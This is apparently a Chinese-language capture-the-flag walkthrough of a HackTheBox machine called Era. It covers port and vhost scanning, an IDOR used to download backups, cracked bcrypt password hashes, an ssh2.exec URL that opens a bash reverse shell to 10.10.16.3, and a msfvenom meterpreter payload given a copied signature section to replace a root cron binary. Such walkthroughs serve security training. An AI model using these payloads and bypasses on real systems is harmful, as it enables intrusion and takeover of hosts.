nmap扫描

└─$ nmap -p- --min-rate 1000 -T4 10.129.137.201 -oA nmapfullscan                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-27 21:19 EDT
Warning: 10.129.137.201 giving up on port because retransmission cap hit (6).
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 30.47% done; ETC: 21:21 (0:01:13 remaining)
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 50.06% done; ETC: 21:21 (0:00:58 remaining)
Nmap scan report for 10.129.137.201
Host is up (0.43s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  httpNmap done: 1 IP address (1 host up) scanned in 157.41 seconds

ffuf扫描vhost

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://era.htb/ -H 'Host: FUZZ.era.htb'

dirsearch扫描页面

dirsearch -u http://file.era.htb/

注册账号并登录

IDOR窃取备份

http://file.era.htb/download.php?id=54&dl=true
http://file.era.htb/download.php?id=150&dl=true

我们爬取sqlite3DB文件

离线破解密码

$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustang

我们用备份数据库里面的内容无法成功登陆，故修改问题答案

SSH2 + SSRF = RCE

登录admin_ef01cab31aa

我们分析源码可知fopen处存在漏洞，只要我们是管理员账户，我们便可以成功控制fopen函数。

那么我们可以尝试使用账号密码来执行一下命令了。

http://file.era.htb/download.php?id=6785&show=true&format=ssh2.exec://eric:america@127.0.0.1:22/bash+-i+>%26+/dev/tcp/10.10.16.3/9001+0>%261;

objcopy sh文件自检绕过

上linpeas.sh搜查

上pspy64监控定时任务

我们且对monitor文件可写，我们生成shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=9001 -f elf -o reverse.elf

传输到受害机器，然后我们提取monitor的特征码（因为直接替换貌似不执行monitor，怀疑存在检测）

#提取monitor的特征码
objcopy --dump-section .text_sig=sig monitor#添加monitor的特征码到恶意文件
objcopy --add-section .text_sig=sig reverse.elf

开启msf监听，然后复制bypass后的恶意文件到monitor

cp reverse.elf monitor

最终我们会获取一个shell